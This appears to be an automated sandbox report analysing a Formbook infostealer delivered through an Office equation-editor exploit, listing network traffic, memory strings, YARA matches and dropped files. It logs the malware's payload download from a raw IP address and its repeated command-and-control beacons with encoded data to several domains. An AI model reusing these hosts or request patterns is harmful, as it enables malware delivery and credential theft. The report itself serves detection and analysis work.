00 00 0a 00 00 02 03 7b 01 00 00 04 7d 01 00 00 04 02 03 7b 05 00 00 04 7d 05 00 00 04 02 03 7b 06 00 00 04 7d 06 00 00 04 02 03 7b 07 00 00 04 7d 07 00 00 04 2a 3a 00 02 7b 04 00 00 04 28 16 00 00 0a 00 2a 00 00 13 30 03 00 77 00 00 00 01 00 00 11 00 03 17 52 02 7b 01 00 00 04 0b 07 0a 06 2c 66 06 72 01 00 00 70 28 17 00 00 0a 2d 29 06 72 21 00 00 70 28 17 00 00 0a 2d 25 06 72 2d 00 00 70 28 17 00 00 0a 2d 25 06 72 39 00 00 70 28 17 00 00 0a 2d 25 2b 30 02 17 7d 08 00 00 04 2b 27 04 04 4a 02 7b 07 00 00 04 58 54 2b 1a 04 04 4a 02
      Source: global trafficHTTP traffic detected: GET /ddr/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.23.212.143Connection: Keep-Alive
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: explorer.exe, 00000009.00000000.502008099.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
      Source: explorer.exe, 00000009.00000000.488322506.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
      Source: explorer.exe, 00000009.00000000.502008099.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
      Source: explorer.exe, 00000009.00000000.502008099.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
      Source: explorer.exe, 00000009.00000000.483010699.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://java.sun.com
      Source: explorer.exe, 00000009.00000000.493715346.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
      Source: explorer.exe, 00000009.00000000.493715346.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: explorer.exe, 00000009.00000000.483450971.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: explorer.exe, 00000009.00000000.486663706.0000000003E50000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
      Source: explorer.exe, 00000009.00000000.493715346.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      Source: explorer.exe, 00000009.00000000.488322506.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://treyresearch.net
      Source: explorer.exe, 00000009.00000000.488322506.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
      Source: explorer.exe, 00000009.00000000.493715346.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: explorer.exe, 00000009.00000000.483450971.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
      Source: explorer.exe, 00000009.00000000.483010699.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
      Source: CFE3BF36.emf.0.drString found in binary or memory: http://www.day.com/dam/1.0
      Source: explorer.exe, 00000009.00000000.488322506.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
      Source: explorer.exe, 00000009.00000000.502008099.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
      Source: explorer.exe, 00000009.00000000.493715346.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
      Source: explorer.exe, 00000009.00000000.488322506.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
      Source: explorer.exe, 00000009.00000000.502008099.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
      Source: explorer.exe, 00000009.00000000.503345454.00000000044E7000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
      Source: explorer.exe, 00000009.00000000.487570517.000000000447A000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
      Source: explorer.exe, 00000009.00000000.502008099.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
      Source: explorer.exe, 00000009.00000000.483010699.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
      Source: ipconfig.exe, 0000000B.00000002.688497436.00000000026B2000.00000004.00020000.sdmpString found in binary or memory: https://www.americanstonesusa.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot
      Source: explorer.exe, 00000009.00000000.483010699.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
      Source: explorer.exe, 00000009.00000000.483010699.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CFE3BF36.emfJump to behavior
      Source: unknownDNS traffic detected: queries for: www.americanstonesusa.com
      Source: global trafficHTTP traffic detected: GET /ddr/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.23.212.143Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ== HTTP/1.1Host: www.americanstonesusa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?5jo4nr=S+ZwTBrK0+7RoomNfSvQ9j84ffpxKdfieFGWtVtD4WHCIMGVYLqiZt07bDY98RTkl0TyTg==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1Host: www.plasticplank.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=QEezsAFDlNAB3yJURHSMHXjRGqVB06lXE20lDVvtKCtrVdaWOVmvQD4ln9eCVkj8l4WBCQ== HTTP/1.1Host: www.realstyleworks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=enVshZ5ucPnpEJ79XKthUFU7GSCP6zpooNwVCr/P0s5BKPQIOoeKppWI2ezsgMpUEHhlAA== HTTP/1.1Host: www.authorjameswshepherdonline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=54OfAHeKGwMzfFPkI96ZbDhctG36f6+/FiUzkHshmPfrtcl9VWH+3olASXX+4wyWJIckJQ== HTTP/1.1Host: www.hanlansmojitovillage.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?5jo4nr=JnpX3/YBBy9TCXbKhp8uYEFRBGzb3gJR2p4kRdES4yzOlzRdyh/c8y0xiKK/8z4KJyQSLA==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1Host: www.thaysay.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?5jo4nr=B6rYep0Vm3M2EhGqYu/feA67U2SQJtGoCN7KN6fFlDVSMwI26b57yYW0nsnzi8vT4Ky8RQ==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1Host: www.onpar-golf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ== HTTP/1.1Host: www.americanstonesusa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?5jo4nr=S+ZwTBrK0+7RoomNfSvQ9j84ffpxKdfieFGWtVtD4WHCIMGVYLqiZt07bDY98RTkl0TyTg==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1Host: www.plasticplank.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=QEezsAFDlNAB3yJURHSMHXjRGqVB06lXE20lDVvtKCtrVdaWOVmvQD4ln9eCVkj8l4WBCQ== HTTP/1.1Host: www.realstyleworks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=enVshZ5ucPnpEJ79XKthUFU7GSCP6zpooNwVCr/P0s5BKPQIOoeKppWI2ezsgMpUEHhlAA== HTTP/1.1Host: www.authorjameswshepherdonline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=54OfAHeKGwMzfFPkI96ZbDhctG36f6+/FiUzkHshmPfrtcl9VWH+3olASXX+4wyWJIckJQ== HTTP/1.1Host: www.hanlansmojitovillage.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?5jo4nr=JnpX3/YBBy9TCXbKhp8uYEFRBGzb3gJR2p4kRdES4yzOlzRdyh/c8y0xiKK/8z4KJyQSLA==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1Host: www.thaysay.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?5jo4nr=B6rYep0Vm3M2EhGqYu/feA67U2SQJtGoCN7KN6fFlDVSMwI26b57yYW0nsnzi8vT4Ky8RQ==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1Host: www.onpar-golf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ== HTTP/1.1Host: www.americanstonesusa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?5jo4nr=S+ZwTBrK0+7RoomNfSvQ9j84ffpxKdfieFGWtVtD4WHCIMGVYLqiZt07bDY98RTkl0TyTg==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1Host: www.plasticplank.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=QEezsAFDlNAB3yJURHSMHXjRGqVB06lXE20lDVvtKCtrVdaWOVmvQD4ln9eCVkj8l4WBCQ== HTTP/1.1Host: www.realstyleworks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, type: MEMORY

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Office equation editor drops PE fileShow sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      .NET source code contains very large stringsShow sources
      Source: vbc[1].exe.4.dr, Forms/mainForm.csLong String: Length: 38272
      Source: vbc.exe.4.dr, Forms/mainForm.csLong String: Length: 38272
      Source: 6.0.vbc.exe.200000.0.unpack, Forms/mainForm.csLong String: Length: 38272
      Source: 6.2.vbc.exe.200000.0.unpack, Forms/mainForm.csLong String: Length: 38272
      Source: 7.2.vbc.exe.200000.0.unpack, Forms/mainForm.csLong String: Length: 38272
      Source: 7.0.vbc.exe.200000.0.unpack, Forms/mainForm.csLong String: Length: 38272
      Source: 8.2.vbc.exe.200000.1.unpack, Forms/mainForm.csLong String: Length: 38272
      Source: 8.0.vbc.exe.200000.0.unpack, Forms/mainForm.csLong String: Length: 38272
      Source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E3070
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E009C
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E1121
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E1B00
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E3C28
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E44A0
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E5D90
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E4EF1
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E1700
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E68A8
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E8210
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E8200
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001EC2C7
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E6B9A
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E3B88
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E13B0
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E6BA8
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E83E0
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001EAC0A
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E5CA9
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E04E1
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E7D38
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E7D48
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001EB5D0
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001EAF31
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001EA748
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001EAF40
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E7F80
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00401030
      Source: C:\Users\Public\vbc.exeCode function: 8_2_0041B8D6
      Source: C:\Users\Public\vbc.exeCode function: 8_2_0041C2CA
      Source: C:\Users\Public\vbc.exeCode function: 8_2_0041CB5C
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00408C5D
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00408C60
      Source: C:\Users\Public\vbc.exeCode function: 8_2_0041C51E
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00402D87
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00402D90
      Source: C:\Users\Public\vbc.exeCode function: 8_2_0041B6D3
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00402FB0
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A7E0C6
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00AAD005
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A83040
